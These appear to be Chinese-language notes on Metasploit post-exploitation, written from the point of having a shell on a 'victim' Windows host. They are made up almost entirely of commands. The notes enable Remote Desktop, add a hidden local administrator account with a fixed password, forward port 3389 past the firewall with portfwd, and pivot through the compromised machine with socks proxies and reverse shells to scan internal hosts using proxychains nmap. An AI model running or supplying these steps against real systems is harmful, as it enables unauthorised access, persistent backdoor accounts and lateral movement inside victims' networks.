拿到shell 开启远程终端
开启远程终端 添加账号
getgui 模块——开启远程桌面
run getgui -e
#开启目标主机远程桌面
run post/windows/manage/enable_rdp
run getgui -u myqf -p QWEasd123 添加本地管理员
转发端口
如果服务器防火墙开启的情况下,有可能拦截远程终端端口,使用命令把远程端口3389转发出来
Usage: portfwd [-h] [add | delete | list | flush] [args]
转发3389端口
命令:
portfwd add -l 1234 -p 3389 -r 受害者主机
rdesktop 127.0.0.1:1234
如果不能连接:
参考:https://zhuanlan.zhihu.com/p/371497627
跨路由访问
参考:内网渗透 psexec
kali无法直接访问目标主机 但是kali获取受害者的权限 得知可以访问目标主机,所以可以通过受害者做跳板访问目标主机
socks 相关设置:
setg Proxies socks4a/5:ip:port #让msf所有模块的流量都通过此代理走。(setg全局设置)
setg Proxies socks5:192.168.0.189:1080
set ReverseAllowProxy true #允许反向代理,通过socks反弹shell,建立双向通道。(探测可以不设置此项)
忘记输该命令,run 运行好像也会提示没有输入该命令
利用:
proxychains4 nmap 10.10.10.144 -sT -A -p 445